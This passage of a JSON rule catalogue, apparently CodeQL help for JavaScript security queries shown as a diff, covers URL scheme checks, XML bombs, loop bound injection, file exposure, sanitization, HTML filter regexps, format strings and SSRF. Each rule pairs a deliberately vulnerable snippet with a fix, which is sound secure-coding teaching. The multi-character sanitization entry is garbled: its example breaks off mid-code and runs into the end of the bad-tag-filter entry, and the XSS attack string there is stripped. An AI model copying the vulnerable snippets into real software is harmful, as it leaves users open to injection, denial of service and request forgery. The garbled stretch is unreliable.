[CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n", + "markdown" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. 
While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020", "external/cwe/cwe-184" ], + "description" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n and 
\"data:\" suggests a logic error or even a security vulnerability.", + "id" : "js/incomplete-url-scheme-check", + "kind" : "problem", + "name" : "Incomplete URL scheme check", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/xml-bomb", + "name" : "js/xml-bomb", + "shortDescription" : { + "text" : "XML internal entity expansion" + }, + "fullDescription" : { + "text" : "Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. 
Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an 
abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. 
If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-776", "external/cwe/cwe-400" ], + "description" : "Parsing user input as an XML document with arbitrary internal\n entity expansion is vulnerable to denial-of-service attacks.", + "id" : "js/xml-bomb", + "kind" : "path-problem", + "name" : "XML internal entity expansion", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/loop-bound-injection", + "name" : "js/loop-bound-injection", + "shortDescription" : { + "text" : "Loop bound injection" + }, + "fullDescription" : { + "text" : "Iterating over an object 
with a user-controlled .length property can cause indefinite looping." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. 
Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", + "markdown" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. 
Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-834", "external/cwe/cwe-730" ], + "description" : "Iterating over an object with a user-controlled .length\n property can cause indefinite looping.", + "id" : "js/loop-bound-injection", + "kind" : "path-problem", + "name" : "Loop bound injection", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/exposure-of-private-files", + "name" : "js/exposure-of-private-files", + "shortDescription" : { + "text" : "Exposure of private files" + }, + "fullDescription" : { + "text" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. 
This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n", + "markdown" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. 
This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-200", "external/cwe/cwe-219", "external/cwe/cwe-548" ], + "description" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure\n of private information.", + "id" : "js/exposure-of-private-files", + "kind" : "problem", + "name" : "Exposure of private files", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/incomplete-sanitization", + "name" : "js/incomplete-sanitization", + "shortDescription" : { + "text" : "Incomplete string escaping or encoding" + }, + "fullDescription" : { + "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. 
The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. 
Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. 
Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], + "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", + "id" : "js/incomplete-sanitization", + "kind" : "problem", + "name" : "Incomplete string escaping or encoding", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-multi-character-sanitization", + "name" : "js/incomplete-multi-character-sanitization", + "shortDescription" : { + "text" : "Incomplete multi-character sanitization" + }, + "fullDescription" : { + "text" : "A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. 
For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", + "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). 
However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common 
Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], + "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", + "id" : "js/bad-tag-filter", + "kind" : "problem", + "name" : "Bad HTML filtering regexp", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/tainted-format-string", + "name" : "js/tainted-format-string", + "shortDescription" : { + "text" : "Use of externally-controlled format string" + }, + "fullDescription" : { + "text" : "Using external input in format strings can lead to garbled output." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. 
The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n", + "markdown" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. 
If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. 
The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-134" ], + "description" : "Using external input in format strings can lead to garbled output.", + "id" : "js/tainted-format-string", + "kind" : "path-problem", + "name" : "Use of externally-controlled format string", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.3" + } + }, { + "id" : "js/request-forgery", + "name" : "js/request-forgery", + "shortDescription" : { + "text" : "Server-side request forgery" + }, + "fullDescription" : { + "text" : "Making a network request with user-controlled data in the URL allows for request forgery attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. 
A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. 
For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", + "markdown" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. 
